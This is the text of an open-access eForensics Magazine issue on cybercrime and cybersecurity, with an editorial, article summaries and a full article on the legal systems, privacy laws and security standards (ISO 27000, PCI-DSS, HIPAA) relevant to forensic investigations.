Important Announcement
PubHTML5 Scheduled Server Maintenance on (GMT) Sunday, June 26th, 2:00 am - 8:00 am.
PubHTML5 site will be inoperative during the times indicated!

Home Explore CYBERCRIME AND CYBERSECURITY

CYBERCRIME AND CYBERSECURITY

Published by intanfarihin_year5, 2022-06-28 12:08:07

Description: CYBERCRIME AND CYBERSECURITY

Search

Read the Text Version

TEAM Dear Readers, Editor: We are pleased to present you our new OPEN issue “Cyber- Joanna Kretowicz Crime and CyberSecurity”of eForensics Magazine with [email protected] an open access, so that everybody interested in the sub- Betatesters/Proofreaders: ject is able to download it free of charge. This edition was carefully Olivier Caleff, Kishore P.V., JohanScholtz, prepared to present our Magazine to a wider range of readers. We Mark Dearlove, Massa Danilo, Andrew hope that you will enjoy reading our Magazine and subjects covered J. Levandoski, Robert E. Vanaman, Tom in this issue will help you to stay updated and aware of all possible Urquhart, M1ndl3ss, Henrik Becker, pitfalls! JAMES FLEIT, Richard C Leitz Jr This particular edition will focus on the importance of legal and Senior Consultant/Publisher: regulatory aspects for the cybersecurity and cybercrime. You can- Paweł Marciniak not overestimate importance and necessity of eForensic analysis CEO: Ewa Dudzic in a society where the Internet assumes the biggest and on-going [email protected] change in our lifetime. We use forensic analysis with the purpose Marketing Director: Joanna Kretowicz of crime investigation; but to do that effectively we should under- [email protected] stand which laws and regulations have been broken. It is crucial to Art Director: Ireneusz Pogroszewski understand what legal systems are existing, what are the types of [email protected] law, standards, types of cybercrime, the part of the computer sys- DTP: Ireneusz Pogroszewski tem and, of course, how one can apply this knowledge. Publisher: Hakin9 Media Sp. z o.o. SK Additionally, we will cover topic of CSA STAR Certification, an effec- 02-676 Warszawa, ul. Postępu 17D tive way of evaluation and comparison of cloud providers. Technolog- Phone: 1 917 338 3631 ical developments, constricted budgets, and the need for flexible ac- www.eforensicsmag.com cess have led to an increase in business demand for cloud computing. Many organizations are wary of cloud services due to apprehensions DISCLAIMER! around security issues. eForensics Magazine in cooperation with BSI The techniques described in our articles GROUP prepared an excellent workshop where you can master your may only be used in private, local net- knowledge required to get CSA STAR Certification. works. The editors hold no responsibility What’s more – we added one article from our “Packet Analy- for misuse of the presented techniques or sis” workshop as a trial. More materials you can find under consequent data loss. http://eforensicsmag.com/course/packetanalysis/. Read our new issue and get all the answers you were looking for! 2 We would like to thank you for your interest and support and invite you to follow us on twitter and Facebook, where you can find the lat- est news about our magazine and great contests. Do you like our maga- zine? Like it, share it! We appreciate your every comment and would be pleased to know what are your expectations towards our magazine! Keep your information safe and do not forget to send us your feed- back. Your opinion is important to us! Valeriia Vitynska eForensics Assistant Manager and eForensics Team www.eForensicsMag.com

CYBERCRIME AND CYBERSECURITY – THE LEGAL AND REGULATORY 05 ENVIRONMENT by Iana Fareleiro and Colin Renouf 14 22 In this article we will look at the environment in which eForensics exists; the legal and regulatory 27 regimes in which systems and cyber criminals operate. We perform forensic analysis on systems to 29 investigate a crime and hopefully prosecute a criminal; but to do that we need to understand which 37 laws and regulations have been broken. There are pitfalls in working out what laws and regulations are in operation for a particular context; as what is illegal in one regime may not be in another, and is it the law in the location of the system or the criminal that applies? The information here forms the underlying legal knowledge in the CISSP certification and underpins the International Information Systems Security Certification Consortium (ISC)2 knowledge. ARE 2 FACTOR AUTHENTICATIONS ENOUGH TO PROTECT YOUR MONEY? TARGETING ITALIAN BANK AND CUSTOMERS by Davide Cioccia and Senad Aruch During last few years banks, and different financial institutions, have been trying to protect or pre- vent fraud and cyber-attacks from accessing their customers’ credentials. They increased security and login factors to avoid these kind of problems. One of these is the Two Factor Authentication (2FA), used to “help” username and password to protect the bank account. AN OVERVIEW OF CLOUD FORENSICS by Dejan Lukan When discussing cloud forensics, we’re actually talking about the intersection between cloud com- puting and network forensic analysis. Cloud computing basically refers to a network service that we can interact with over the network; this usually means that all the work is done by a server some- where on the Internet, which might be backed up by physical or virtual hardware. In recent years, there has been a significant increase on the use of virtualized environments, which makes it very probable that our cloud service is running somewhere in a virtualized environment. AUTHENTICATING REMOTE ACCESS FOR GREATER CLOUD SECURITY by David Hald, co-founder, chief relation officer The nature and pace of business have changed as technology has opened new possibilities for or- ganizations. One of these possibilities is cloud services, which benefit companies by enabling remote access to data stored offsite. Its convenience has made cloud services incredibly popular, both to business and malicious actors. With so much data at stake, the rise in the use of remote access neces- sitates ironclad security. Authenticating the identities of users remotely accessing these resources has never been more critical. PACKET ANALYSIS WITH WIRESHARK AND PCAP ANALYSIS TOOLS by Eric A. Vanderburg Almost every computer today is connected. Their communication with others takes the form of pack- ets which can be analyzed to determine the facts of a case. Packet sniffers are also called as network analyzers as it helps in monitoring every activity that is performed over the Internet. The information from packet sniffing can be used to analyze the data packets that uncover the source of problems in the network. The important feature of packet sniffing is that it captures data that travels through the network, irrespective of the destination. A log file will be generated at the end of every operation performed by the packet sniffer and the log file will contain the information related to the packets. UNDERSTANDING DOMAIN NAME SYSTEM by Amit Kumar Sharma Domain Name System (DNS) DNS spoofing also referred to as DNS cache poisoning in the techni- cal world is an attack whereinjunk (customized data) is added into the Domain Name System name server’s cache database, which causes it to return incorrecdata thereby diverting the traffic to the at- tacker’s computer. 3 www.eForensicsMag.com

CSA CERTIFICATION OFFERS SIMPLE, COST EFFECTIVE WAY TO EVALUATE 49 AND COMPARE CLOUD PROVIDERS 55 by John DiMaria 67 70 Technological developments, constricted budgets, and the need for flexible access have led to an increase in business demand for cloud computing. Many organizations are wary of cloud ser- vices, however, due to apprehensions around security issues. Ernst & Young conducted a survey of C-level leaders in 52 countries which showed a unified concern over the accelerated rate that companies are moving information to the cloud and the subsequent demise of physical bounda- ries and infrastructure. ROAD MAP TO CSA STAR CERTIFICATION – OPTIMIZING PROCESSES, REDUCING COST AND MEETING INTERNATIONAL REQUIREMENTS by John DiMaria For centuries, the Swiss dominated the watchmaking industry and their national identity was some- what tied to their expertise in the precision mechanics required to making accurate timepieces. Yet the Swiss were so passionate about their expertise that they hesitated to embrace the new tech- nology in watchmaking with batteries and quartz crystals. With Japan’s introduction of the quartz wristwatch in 1969, the majority Swiss market share dropped from 80% at the end of World War II to only 10% in 1974 (Aran Hegarty, Innovation in the Watch Industry, Timezone.com, (November 1996) http://people.timezone.com/library/archives/archives0097). Ironically, it was the Swiss who had in- vented the quartz watch but failed to see its potential. EFORENSICS CSA STAR CERTIFICATION SUPPLY CHAIN MANAGEMENT USING CSA STAR CERTIFICATION by John DiMaria When an organization adopts cloud services, it is in fact expanding its operations from a local or re- gional presence to a more global one. As a result, the corresponding organizational operations’ strat- egy needs to be adjusted to align with these changes. A more formal analysis of the supply-chain as part of a more comprehensive due diligence review also needs to be considered (By definition, the Cloud Controls Matrix (CCM) is a baseline set of security controls created by the Cloud Security Alli- ance to help enterprises assess the risk associated with a cloud computing provider). CONTINUOUS MONITORING – CONTINUOUS AUDITING/ASSESSMENT OF RELEVANT SECURITY PROPERTIES by John DiMaria While the Cloud Security Alliance’s (CSA) STAR Certification has certainly raised the bar for cloud providers, any audit is still a snap-shot of a point in time. What goes on between audits can still be a blind spot. To provide greater visibility, the CSA developed the Cloud Trust Protocol (CTP), an industry initiative which will enable real time monitoring of a CSP’s security properties, as well as providing continuous transparen-cy of services and comparability between services on core security proper- ties (Source: CSA CTP Working Group Charter). This process is now being further developed by BSI and other industry leaders. CTP forms part of the Governance, Risk, and Compliance stack and the Open Certification Frame-work as the continuous monitoring component, complementing point-in- time assessments provided by STAR certification and STAR attestation. CTP is a common technique and nomenclature to request and receive evidence and affirmation of current cloud service operat- ing circumstances from CSPs. 4 www.eForensicsMag.com

CYBERCRIME AND CYBERSECURITY – THE LEGAL AND REGULATORY ENVIRONMENT by Iana Fareleiro and Colin Renouf eForensic analysis becomes essential and necessary in a society where the Internet assumes the biggest and on-going change in our lifetime. It will take place as a result of a crime or investigation. However, what is relevant and worth searching for, or even what can be legally analyzed, depends on the legal systems and regulations, the criminal and, maybe, even customers or users affected. What you will learn: T he laws broken may be existing laws pertaining to theft or threats of vio- lence where the computer systems are central, or the computer system In this article we will look at the envi- may be on the periphery of the crime, or it may be specific information ronment in which eForensics exists; systems or computer privacy laws and regulations that are relevant; possibly the legal and regulatory regimes in even a combination of all of them. These laws and regulations may conflict, which systems and cyber criminals and what is illegal in one country or region may not be illegal in another. operate. We perform forensic analy- sis on systems to investigate a crime As a cyber security expert we need to understand what we are aiming to and hopefully prosecute a criminal; prove and what data we can legally investigate before we begin our work. but to do that we need to under- stand which laws and regulations In addition to existing laws within the legal systems at work, specific cy- have been broken. There are pitfalls ber laws were created to protect individuals, companies and governments in working out what laws and regula- against cyber crime; which can be divided in three categories: tions are in operation for a particular context; as what is illegal in one re- • Computer-assisted crime is where a computer is used as a tool to assist gime may not be in another, and is it on committing a crime, the law in the location of the system or the criminal that applies? The in- • Computer-targeted crime happens when a computer was the main target formation here forms the underlying and victim of an attack, legal knowledge in the CISSP certi- fication and underpins the Interna- • The last category includes situations where the computer happens to be tional Information Systems Security involved in a crime; but is not the attacker or attackee; and is peripheral Certification Consortium (ISC)2 body to the crime itself. of knowledge. These categories were created to facilitate the law enforcement of cyber crimes. Laws can be general and include numerous scenarios, instead of the need to create specific laws for each individual case. 5 www.eForensicsMag.com

The idea is to use the existing laws for any crime where possible, allowing an easier understanding of the basis for prosecution for all people involved, including the judge and jury, who can then provide the verdict and sentence based on existing guidelines and standards. The downside of introducing specific cyber laws is that, for example, when companies are attacked they just want to ensure that the vulnerability exposed is fixed and avoid any embarrassment that would adversely affect the company reputation. Even when information as to an attack leaks out companies do not seem interested on spending time and money in courts; preferring to minimize the time of embarrass- ment. This is the main reason as of why cyber criminals are unpunished and easily get away with such il- legal actions. Not many companies wish to be known as victim of a cyber attack since that can adversely influence customer confidence and scare away investors LEGAL SYSTEMS There are essentially four different models of legal systems; civil law, common law, religious law, and customary law. CIVIL LAW In civil law, employed by most countries, a legislative branch of the government develops and docu- ments statutes and laws, and then a judiciary has some latitude for interpreting them. The legislation is prescriptive so legal precedence, whilst existing, has little force. In some such systems, such as that de- rived from Roman law or the later ‘Napoleonic code’, the judge assesses the proof as a measure of guilt of the criminal. COMMON LAW This system, used in the UK, US, Canada, Australia and other former British colonies amongst others, is often derived from the English legal system. A legislative branch of government still produces statues and laws, but great emphasis is placed on judicial interpretation, precedent and existing case law; which can even override and supersede the legislation and statute if a conflict is found to occur. Thus, time is important in this system as judicial interpretation may develop and traditional interpretation of custom and “natural” law acts as a basis for the system. The judiciary and its interpretation of the legislation and precedent in existing case law has a greater role in this system than in the civil law system. In the Eng- lish legal system and its derivatives the role of the jury to interpret the evidence in assessing the burden of proof is common. RELIGIOUS LAW In religious law, such as Sharia Law adopted by several Islamic countries and groups, religious texts and doctrine provide the basis for the legal system, rather than separate statute and legislation. Here the given target religion is accepted by the majority of the people or their rulers; such that they essentially become laws to which the people abide. The laws enforced may be interpreted from the appropriate re- ligious texts by religious leaders; such as imams or ayatollahs. CUSTOMARY LAW In this existing regional customs accepted by the majority of the people over a period of time provide the basis for the legal system to the extent that they essentially become laws to which the people abide. These customs may later be codified to some extent. This model is seen in the other legal models in “duty of care” and “best practice” interpretation as what would be expected of a “reasonable man” as a measure; such as in the tort law of the civil law branch of common law. TYPES OF LAWS Within common law itself, civil law plays a part, alongside criminal law, tort law and administrative law. As groups of countries collaborate, such as in the European Union (EU), the combinations become more complex, but the types of law are common at the core due to the prevalence of the English legal system and its derivatives in the UK, US, Australia, etc. CRIMINAL LAW In criminal law the aim is law and order of the common citizen and deterrence of criminals when pun- ishing offenders; so the victim of the crime is considered society itself from the view of prosecution, even though the actual victim may be a person or persons. Hence, the existence of the Crown Pros- ecution Service (CPS) in the UK for pursuing the criminal through the courts under criminal law with 6 www.eForensicsMag.com

an aim to remove the offender from affecting society. The criminal is incarcerated or even deprived of his or her life under some circumstances so there is an emphasis on burden of proof being “beyond reasonable doubt”. CIVIL LAW Here the individual has been wronged and seeks legal recourse in terms of damages from a civil defend- ant, rather than loss of liberty, with the evidence essentially reduced from “beyond all reasonable doubt” to a likelihood known as a “preponderance”, i.e. more likely than not. The damages for the wrongdoing may be statutory as prescribed by law, compensatory to attempt to balance loss or injury, or punitive to discourage and deter from future legal violation. TORT LAW This is a branch of civil law related to wrongdoing against an individual measured against “best practice” or “duty of care”, where the action taken or negligence of responsibility of an individual or organization is considered to be outside the bounds expected of behavior of a “reasonable, right thinking, or prudent man”; and in this relates back to custom, and often may change over time. Here again, the burden of proof is on preponderance of the evidence weighing against the defendant. This is the largest source of lawsuits and damages under major legal systems. This is particularly important in the realms of cyber security laws. In protecting customer data the “Prudent Man Rule” is applied to set the bar for duty of care in what processes, infrastructure and prac- tices a right thinking person would consider necessary as a minimum. If a business is seen to be below that bar of expectation then the organization and business stakeholders are considered negligent in pro- viding the necessary due care to protect its customers, assets and business stakeholders. A company has to exercise due diligence continuously in reviewing its own and third party partners and processes to ensure that the necessary standard of due care is being met. As the technologies and threats in the industries adapt all of the time, due diligence ensures the minimum bar changes accord- ingly. Whenever a new third party is brought into a company processes the necessary due diligence in assessing that party for past criminal history, threats and their own due care protection standards and due diligence processes must be performed. CONTRACT LAW Agreements between companies and individuals can be broken, whether verbal or documented in writ- ing, and damages for wrongdoing can occur. This is again a type of civil law. ADMINISTRATIVE AND REGULATORY LAW This covers governance, compliance and regulatory laws relating to government and government agen- cies. Governments enact these laws with less influence from the judiciary. Compliance laws, such as Sarbannes-Oxley, come under this branch of the legal system. INTELLECTUAL PROPERTY LAWS One of the targets in many cyber crimes is stealing intellectual property, so companies go to great tech- nical lengths and legal lengths to protect it. Whilst intellectual property isn’t physical in nature, compa- nies require creativity and then investment to capitalize on it. It takes a number of forms from trademark, copyright, licenses, patents and even simple trade secrets that a company entrusts to its staff. A trademark is a name, image or logo for a brand that is used in marketing and is associated with a brand by its customers and competitors; and it may be formally registered or unregistered. Whilst steal- ing the logo itself is not usually a major criminal target, in phishing attacks a log may be used to misrep- resent the cyber criminals web site as that of the company owning the brand. Copyright is the right of an owner of a musical, artistic or literary work to own, duplicate, distribute and amend that work themselves. Often cyber criminals will duplicate a copyrighted work and sell it or pro- vide it for download as their own property. A patent is a legal agreement protecting the use of an idea or invention such that the patent holder has exclusive rights on the use and licensing of that idea for a period of time covered by the patent. Some rogue nations and cyber criminals will ignore the patent and use the invention or idea as their own, 7 www.eForensicsMag.com

and legal recourse is then required by the patent holder to obtain compensation. A license is a contract between a vendor and consumer or business to use software within the bounds of an “end user license agreement”, and not duplicate, modify, redistribute or sell on that software. A trade secret is proprietary information belonging to a business in a competitive market that its staff and third parties should not divulge, and is often subject to a non-disclosure agreement (NDA) that is a contract between the business and a third party or employee to not divulge that secret. The business must exercise due care to protect that trade secret. DATA PRIVACY LAWS With the rise in cyber crime and stealing of customer data being a regular objective of the cyber criminal, most countries and states introduced their own data protection laws. These cover the processes and ex- pected standard behavior for protecting data, but often also include clauses as to where that data can be located and what countries and under what circumstances it can be shared. In the US the Privacy Act of 1974 protects the data held by the US government on its citizens, and how it is collected, transferred between departments, and used; with individuals having legal recourse on be- ing able to request access to the data held about them, with national security providing the main limita- tion to that access. Similarly, in the European Union the EU Data Protection Directive sets the bounda- ries on the collection and flow of personal data between member nations; with a fine line between the needs of commerce between different member nations and the privacy of the individual. The EU prin- ciples are considered more stringent than those of the US, so the EU-US Safe Harbor legal framework allows that EU data to be shared with US organizations if they adhere to the more stringent EU Data Protection Directive principles. The EU Data Protection Directive principles are: • Individuals must be notified how their personal data is collected and used • Individuals must be able to opt out of sharing their data with third parties • Individual must opt in to shared sensitive personal data • Reasonable protections must be in place to protect the personal data This latter rule brings in the duty of care legal measure. The United States Code Section 1030 Title 18, usually known as the Computer Fraud and Abuse Act defines the environment in which systems are considered to have been attacked in government and com- mercial organizations and the recourse against the criminal. This was amended by the Patriot Act 2001 as a response to the September 11th attacks to allow easier implementation of wiretaps by law enforce- ment agencies and easier sharing of data between those agencies, along with more stringent punishment for damaging a protected system from the original act or dealing with individuals on the sanctions list. The Identity Theft Act further amends the original act to provide additional protection for the individual. STANDARDS International bodies, industries, and some groups of companies may produce their own standards to which individuals and companies may comply, and claiming such compliance is a requirement for taking part in that industry from a financial or regulatory perspective, or may be required as part of a contract. So, companies supporting the payments with debit and credit cards usually have to adhere to the PCI- DSS standards mandated by the card industry vendors, or health service vendors in the US must deliver to HIPAA data security standards for patient data as mandated by US administrative law. In the early days of networked IT (1995) the British Standards Institute started to develop BS7799 that outlines how an information security management system should be designed, built and maintained; with guidelines on what is necessary in the forms of policies and processes; along with the technologies necessary to holistically protect sensitive information from the physical, to the network, to the electronic. From this the ISO/IEC 27000 standards were developed; using an iterative process where objectives and plans are formed (Plan), then implemented (Do), the results measured to see if the objectives were met (Check), and then amendments made as necessary (Act) – the whole iterative process is known as the PDCA cycle. 8 www.eForensicsMag.com

ISO27000 The ISO and International Electrotechnical Commission (IEC) standards bodies jointly issue the ISO27000 Information Technology – Security Techniques family of standards for information security management best practice for risks and controls; which was, as mentioned, derived from the earlier BS7799 British Standard and the later ISO/IEC 17799 standard. These bodies have a committee called Joint Technical Committee 1 (JTC 1) Subcommittee 27 SC27 that meets twice a year to consider and ratify the stand- ards and amendments to provide the “information security management system” (ISMS), with the 27000 base standard providing an overview of the complete family of policy-oriented standards and the vocabu- lary used throughout. The individual standards are as follows: ISO/IEC Description Standard 27000 Information security management systems – Overview and vocabulary 27001 Information security management systems – Requirements 27002 Code of practice for information security management 27003 Information security management system implementation guidance 27004 Information security management – Measurement 27005 Information security risk management 27006 Requirements for bodies providing audit and certification of information security management systems 27007 Guidelines for information security management systems auditing 27008 Guidance for auditors on ISMS controls 27010 Information security management for inter-sector and inter-organizational communications 27011 Information security management guidelines for telecommunications organizations based on ISO/IEC 27002 27013 Guideline on the integrated implementation of ISO/IEC 27001 and ISO/IEC 20000-1 27014 Information security governance 27015 Information security guidelines for financial services 27017 Information security management for cloud systems 27018 Data protection for cloud systems 27019 Information security management guidelines based on ISO/IEC 27002 for process control systems specific to the energy utility industry 27031 Guidelines for information and communication technology readiness for business continuity 27032 Guideline for cybersecurity 27033 IT network security, a multi-part standard based on the ISO/IEC 18028:2006 27033-1 Network security – Part 1: Overview and concepts 27033-2 Network security – Part 2: Guidelines for the design and implementation of network security 27033-3 Network security – Part 3: Reference networking scenarios – Threats, design techniques and control issues 27033-5 Network security – Part 5: Securing communications across networks using Virtual Private Networks (VPNs) 27034-1 Application security – Part 1: Guidelines for application security 27035 Information security incident management 27036 Information security for supplier relationships 27036-3 Information security for supplier relationships – Part 3: Guidelines for information and communication technology supply chain security 27037 Guidelines for identification, collection, acquisition and preservation of digital evidence 27038 Specification for redaction of digital documents 27039 Intrusion detection and protection systems 27040 Guideline on storage security 27041 Assurance for digital evidence investigation methods 27042 Analysis and interpretation of digital evidence 27043 Digital evidence investigation principles and processes 27799 Information security management in health using ISO/IEC 27002 9 www.eForensicsMag.com

These aren’t laws, but many contracts will insist that participants adhere to the complete body of the standard, or its individual components. Adherence to the standard or its components can also be used as a quality measure, and can act as a selling point; and in negotiations this can be important. Therefore, this standard can appear in the enacting of contract law. The individual components cover investigation and forensic analysis, as well as relationships with third parties. However, one of the key areas where the standard impacts the legal environment for cyber se- curity is in the influence it has had on other standards and regulations that can be enforced as the cost of doing business in some industries, e.g. PCI-DSS in companies involved in credit card sales. When evaluating compliance or where criminal responsibility is being assessed ISO/IEC27000 provides a ba- sis by which what is expected of the “reasonable man” can be measured from a legal perspective. INFORMATION TECHNOLOGY INFRASTRUCTURE LIBRARY (ITIL) ITIL, like the foundations of ISO/IEC27000 was developed by the UK government, with an aim of stand- ardizing and documenting service management and aligning IT with the business with a common lan- guage. IT should provide good customer service to the business it serves. Whilst not providing a security framework it does cover support, change and maintenance processes and all of the foundations for busi- ness continuity and disaster recovery management with great strength in incident management. It covers supplier management, service level management, service catalog management, availability management, incident management, event management, problem management, change management, knowledge management, release and deployment management, service testing and validation, and the requirements of a configuration management system. It has processes for service design, service op- eration and service transition. Across all of this is continual process improvement as a result of service reporting and service measurement. At the core of ITIL is the concept of IT as a service. Again, ITIL is referenced in contracts and often used as a selling point, but in the legal world outside of contracts is more useful as a measure of the expectations for the “reasonable man”. CONTROL OBJECTIVES FOR INFORMATION AND RELATED TECHNOLOGIES (COBIT) This was produced by the Information Systems Audit and Control Association in 1996 as a general framework of processes, policies, and governance for the management of IT as a whole, not just secu- rity; and the current version aligns with ITIL and ISO27000 standards to provide a full framework and model for IT as the basis of a capability maturity model. It splits IT into domains; Plan and Organize, Acquire and Implement; Deliver and Support; and Monitor and Evaluate; and across these includes a framework, process descriptions, control objectives, manage- ment guidelines, and maturity models. Whilst ISO27000 provides high level guidelines and processes, the COBIT model contains specific de- tails, such as for user access management and compliance, and how to work with third parties; with a lot of helpful security details particularly in the Plan and Organize, and Acquire and Implement domains; with the processes heavily emphasized in the other two domains. Again, as in ISO/IEC27000, COBIT is often referenced as a selling point or in contracts, but also pro- vides specific processes that tie up with the “reasonable man” assessment from a legal perspective. PAYMENT CARD INDUSTRY DATA SECURITY STANDARD (PCI-DSS) The major card companies (e.g. Visa, MasterCard, American Express, JCB, etc) got together in 2006 to come up with a set of standards for data security that could be measured and enforced for companies wishing to participate in payment card processing. Annually a Qualified Security Assessor (QSA) creates a report on compliance to the standards that are split into 12 requirements in 6 groups. 10 www.eForensicsMag.com

Control Objectives PCI-DSS Requirements Build and Maintain a Secure 1. Install and maintain a firewall configuration to protect cardholder data Network 2. Do not use vendor-supplied defaults for system passwords and other security parameters. Protect Cardholder Data 3. Protect stored cardholder data 4. Encrypt transmission of cardholder data across open, public networks Maintain a Vulnerability 5. Use and regularly update anti-virus software on all systems commonly affected Management Program by malware 6. Develop and maintain secure systems and applications Implement Strong Access Control 7. Restrict access to cardholder data by business need-to-know Measures 8. Assign a unique ID to each person with computer access 9. Restrict physical access to cardholder data Regularly Monitor and Test 10. Track and monitor all access to network resources and cardholder data Networks 11. Regularly test security systems and processes Maintain an Information Security 12. Maintain a policy that addresses information security Policy The aim of the PCI-DSS standards is to ensure consistency across the card payments industry in the way that customer details and the necessary card data useful for making payments is protected and han- dled. It covers requirements for technology, processes and the relationships with the business and the staff involved. From a customer perspective this acts to protect customers in that companies adhering to the PCI standards can be trusted to look after the data and later fraud would be unexpected. Reviews of continued compliance is required by any company adopting PCI; with the QSA making an assessment and recommendations for any areas of improvement required. So, adherence to PCI is usually contractual, which is how it relates to the law; yet again anyone deal- ing with payment card data would be expected to follow the recommendations within the standard and, thus, fits with the “reasonable man” assessment within legal frameworks. Whilst US federal law doesn’t mandate companies adhere to PCI-DSS if dealing with card data, the laws in some states within the US and elsewhere do refer to it so it is likely to become the law in the future. MasterCard and Visa require service providers and merchants to be validated for PCI-DSS compliance, and banks must be audited, whereas validation isn’t mandatory for all entities. HEALTH INSURANCE PORTABILITY AND ACCOUNTABILITY ACT (HIPAA) The HIPAA act is a US federal law that covers many areas, but part of it also includes standards for data privacy that overlap with the data privacy laws in some countries and also tie back to the “reasonable man” rule in the gray area between law and standard. Therefore, many information security certifica- tions (CISSP), and standards reference the act and its standards worldwide. The objective of the HIPAA regulatory framework was to provide a secure way for the health insurance of US citizens to be shared between providers when changing or losing jobs, ensuring the citizens not only had any confidential per- sonal information or medical condition information protected physically, but also that the policies were in place to ensure their health insurance benefit position was maintained. The act is in two parts. The first part (Health Care Access, Portability, and Renewability) covers the policies for which US citizens maintain their health insurance across providers, what their entitlement is when switching providers; and as such isn’t applicable to the information security realm at the detail level. The second part (Preventing Health Care Fraud and Abuse; Administrative Simplification; Medical Liability Reform) and its details on data privacy is more relevant to information security professionals, and it is here than granular standards exist and there is an overlap with data privacy laws elsewhere. The Privacy Rule and Security Rule subsections are key here, and the latter includes the standards. The Security Rule is split into Administrative Safeguards, Physical Safeguards and Technical Safeguards and includes standards for encryption, checksums, etc as well as risk management and risk assessment processes. In interpretation of adherence to these process standards the “reasonable man” rule is again brought into use from a legal perspective as the prescriptiveness of the standards is open to interpreta- tion and applicability at many levels. 11 www.eForensicsMag.com

NATIONAL INSTITUTE OF STANDARDS AND TECHNOLOGY (NIST) This is not like the other paragraphs here in that it refers to a standards issuing body as a whole, like the ISO/IEC or BSI bodies referenced earlier; but is mentioned due to its issuing of very detailed build, hardening, and usage standards for IT and security that are often referenced by other standards (e.g. it is often used as best practice build and configuration standards for PCI-DSS compliance) and again act as a yardstick for the “reasonable man” rule in assessing whether a reasonable attempt was made to secure data. The NIST maintains an Information Technology Portal with a standard Cybersecurity Framework, Com- puter Security Resource Centre, and other documentation and groups: http://www.nist.gov/. The US government maintains a standard configuration document for Windows 7 and Red Hat Enter- prise Linux 5 on this site that shows how builds should be done. Of more interest beyond the “reasonable man” debate are the standards and guidelines for eForensic analysis. THE PART OF THE COMPUTER SYSTEM The computer may be a key part of the criminal or civil act, as in the breaking of cyber laws; or may be a peripheral part of the crime itself, as in electronic fraud; or may just be a part of the evidence gathering to build a picture of the crime or criminal. The legal systems and industry standards have specific defini- tions for the role of the computer system in these contexts. Where the computer plays a role as a tool of the criminal, but the crime is general even though the computer is central to the commission of the crime, this is known as a “computer as tool” scenario. Steal- ing credit card information to commit fraud or penetrating a system to steal company intellectual property secrets would be examples of this scenario. Where the crime has the computer as the primary target or “victim” of the crime, particularly where in- formation or cyber security laws are broken, are “computer system as target” scenarios. Hacking to in- stall malware, deployment of computer viruses, and distributed denial of service attacks would fall into examples of this scenario. TYPES OF CYBER CRIME A crime being forensically investigated may be an existing law resulting from theft or a violent act, so fraud using a computer is still fraud and a threat of violence online is still a threat of violence, and a com- puter could be used in hacking to bring about violence or death. It may also be investigation is required for a specific cyber crime that has been broken pertaining only to the use of a computer, such as hacking or denial of service for “fun” or political motivation. Finally regulations may be broken using a computer that can be considered legal and contractual; so a system built to Payment Card Industry-Data Security Standards compliance may be a key term in a contract so non-compliance to the regulations leads to a contractual violation. HOW DO WE APPLY THIS KNOWLEDGE? To perform forensic analysis we obviously first have to protect the evidence, but what evidence we are allowed to access and what is useful requires first understanding which laws are believed to have been broken, the role of the computer, and what laws are in place for the analyst doing the work. It isn’t neces- sarily legal to perform forensic analysis and access personal data for a potential criminal without break- ing a privacy law. The most difficult tasks are when the criminal is in one country or state, the target system is in another, the victim in yet another, and multiple countries have been traversed. Even within a single country like Australia or the United States different laws can apply state to state. The complexity is why so many computer related crimes remain unprosecuted, along with the shame for a company in having been breached. The key to applying the legal knowledge before doing what is needed to achieve a prosecution is identifying what is common between the states and countries involved, and new international frame- works of cooperation are being drawn up to assist in this. 12 www.eForensicsMag.com

INTERNATIONAL LEGAL COOPERATION IN CYBER SECURITY The increase in cyber crime and the need for coordinated anti-terrorist cooperation across state and international boundaries has led to frameworks being drawn up, such as the Safe Harbor coopera- tion between the EU and US. More international work between governments is currently underway to make this easier, not initially due to basic cybercrime, but the need to combat terrorism and terrorist funding. The trick is to identify a common subset on protection against fraud and personal data and work out from that to identify the maximum commonality between all legal state or national entities, and then aim to prosecute in the area where the criminal is most likely to be sentenced; remembering that avoiding breaking the law during the analysis in any of the state or nations during the forensic in- vestigation is a necessity. Post-graduate degrees specifically covering international cyber crime and security are beginning to spring up; such as that being studied by the authors. Personal experience has shown that the specific state knowledge of experienced lawyers can come to nothing in this internationally complex area, so specializations in this niche area are likely to grow in importance. THE INTERNATIONAL, FEDERAL AND STATE INTERPRETATION – WHICH LAWS APPLY? In determining which laws apply to a particular scenario there are four separate considerations that may include different states, countries, and even international groups, such as the EU. When a possible crime occurs involving a computer and data in the modern world, to work out which laws apply, we must con- sider the location of the cyber criminal, the location of the system being attacked, the location of any vic- tims, and the locations over which the data forming the “attack” occurs. CRIME APPLICABILITY AND INVESTIGATION – AN EXAMPLE Consider a mobile phone payments application for purchasing foreign currency for international travel- lers. The user is from the UK, lands in Singapore, but uses a cellphone tower in Malaysia to enact trans- actions hosted on a system in Australia. Which laws apply? In this example, certain compliance restric- tions on checking transactions in Malaysia and Singapore may mean that the application should use geolocation and cell tower identification to shut down to avoid an impossible legal situation. In forensic analysis after the fact where access to personal data might be restricted where the analysis is performed, this gets even more complex. So, if a crime has been deemed to have occurred consider the issue of identifying which country the crime has been committed in. Then assess which Police or agencies will prosecute. However, taking the example of the different privacy acts enforced under the EU, US, Australian, New Zealand, laws etc, and even sharing the evidence with the Police forces can be an issue, because that the personal data of the individual can only be seen by authorised agents of their own country. Often its best to segregate the da- ta and even store it in location in the given country (such as required for many China financial systems) to avoid the complexities and gives the best chance for prosecution of the criminal. WHAT HAVE WE LEARNED? We have looked at the basic types of legal system and how they differ in different countries, and the differ- ent types of laws and regulations that can be broken with different results for the defendant or perpetrator. We have then applied this to examples using computers to see how complex the environment is under which cyber security experts must operate to investigate a crime and see what laws and regulations apply. ABOUT THE AUTHORS Colin Renouf is a long standing IT worker, inventor, and author; currently an Enterprise Solution Architect in the finance indus- try, but having worked in multiple roles and industries over the period of decades. An eternal student, Colin has studied varied subjects in addition to IT. Having written and contributed to several books and articles on subjects ranging from IT architecture, Java, dyslexia, cancer, and security; he is even referenced on one of the most fundamental patents in technology and has been involved in the search for the missing MH370 aircraft. Colin has two incredibly smart and intelligent children; Michael and Olivia; who he loves very much. He would like to thank his co-author and best friend Iana; her lovely sister Taina, brother Tiago, mother Marciaa, and father Jose. What more is there to say, but thank you Red Bull. Iana Fareleiro works as an analyst as part of a fraud and compliance team for a payments card business and is studying a post- graduate cybersecurity and cybercrime course. Originally from Brazil, and having lived in Mozambique, South Africa and Zimba- bwe, and eventually Portugal; she now lives in the UK in Peterborough. She is a movie buff of old, and a scientist at heart who gets great enjoyment out of intellectual argument with like-minded individuals. She would like to thank her sister Taina, brother Tiago, mother Marciaa, and father Jose; and boyfriend Luis. 13 www.eForensicsMag.com

